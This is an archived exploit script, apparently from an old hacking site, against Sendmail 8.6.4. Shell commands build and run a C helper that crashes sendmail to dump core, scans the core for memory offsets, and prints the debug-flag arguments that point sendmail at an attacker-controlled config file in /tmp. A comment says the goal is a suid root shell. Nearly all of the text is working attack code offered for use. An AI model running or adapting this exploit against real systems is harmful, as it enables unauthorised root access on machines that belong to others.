home *** CD-ROM | disk | FTP | other *** search
- # Modified to create a suid root shell in /tmp
- # this has been tested on Sendmamil 8.6.4 but
- # is assumed to work on other versions.
-
- # calculate the parameters needed for a given sendmail
- # program to change config file from "/etc/sendmail.cf"
- # to "/tmp/sendmail.cf"
-
- # location of a readable sendmail program
- SENDMAIL=/usr/lib/sendmail
-
- TEMP=/tmp/.ab$$
- mkdir $TEMP
- cp $SENDMAIL $TEMP/sm
- cd $TEMP
- chmod 700 ./sm
-
- cat > calc.c << _EOF_
-
- #include <fcntl.h>
-
- gencore()
- {
- int pid;
- int fd[2];
-
- if(pipe(fd) < 0) {
- perror("pipe");
- exit(1);
- return(0);
- }
- pid = fork();
- if(!pid) {
- int f = open("./out", O_RDWR|O_CREAT, 0666);
- dup2(f, 1); dup2(fd[0], 0);
- close(f); close(fd[1]); close(fd[0]);
- execl("./sm","sm","-d0-9.90","-oQ.","-bs", 0);
- perror("exec");
- exit(0);
- } else {
- sleep(2);
- kill(pid, 11);
- }
- close(fd[0]);
- close(fd[1]);
- }
-
- main(argc,argv)
- char **argv;
- int argc;
- {
- unsigned int ConfFile,tTdvect,off;
-
- gencore();
- tTdvect = find("ZZZZZZZZ", "core");
- ConfFile = find("/nau/local/lib/mail/aliases", "core");
- if(!tTdvect || !ConfFile) {
- printf("Not found!\n");
- return(0);
- }
- off = ConfFile - tTdvect;
- printf("sendmail -d%u.%d,%u.%d,%u.%d\n",
- off+1, 't', off+2, 'm', off+3, 'p');
- }
-
- int find(pattern, file)
- char *pattern,*file;
- {
- int fd;
- int i, addr;
- char c;
-
- /* printf("find %s: ", pattern); */
- fd = open(file, 0);
-
- /* assume file exists
- if(fd < 0) {
- printf("file %s not found\n", file);
- return(0);
- }
- */
- i = 0;
- addr = 0;
- while(read(fd, &c, 1) == 1) {
- if(pattern[i] == c)
- i++;
- else
- i=0;
- if(pattern[i] == '\0') {
- addr -= strlen(pattern);
- printf("%x (%d)\n", addr, addr);
- return(addr);
- }
- addr++;
- }
- printf("Not Found!\n");
- return(0);
- }
- _EOF_
-
- cc calc.c -o calc
- ./calc
- cd
- rm -rf $TEMP
- # www.hack.co.za [2000]#
